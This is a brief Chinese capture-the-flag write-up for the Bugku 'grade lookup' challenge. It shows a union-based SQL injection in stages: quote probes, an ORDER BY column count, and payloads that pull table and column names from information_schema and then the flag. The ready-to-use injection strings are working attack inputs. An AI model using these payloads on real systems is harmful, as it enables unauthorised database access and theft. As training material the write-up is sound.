Bugku-13.成绩查询-简单sql注入

Bugku-13.成绩查询-简单sql注入

判断注入点类型

1 显示

1' 不显示

2' and '1'='1 显示2的结果,单引号无括号

判断字段数

1' order by 5--+ 不显示

1' order by 4--+显示,字段数为4

判断可用字段

-1' union select 1,2,3,4--+

Bugku-13.成绩查询-简单sql注入

获取数据库

Bugku-13.成绩查询-简单sql注入

获取表名

id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='skctf'),3,4--+

Bugku-13.成绩查询-简单sql注入

获取字段名

id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='skctf' and table_name='fl4g'),3,4--+

Bugku-13.成绩查询-简单sql注入

获取flag

id=-1' union select 1,(select skctf_flag from fl4g),3,4--+

Bugku-13.成绩查询-简单sql注入

上一篇:写SQL的要注意的一些语法


下一篇:MySQL基础语法—(union联合查询)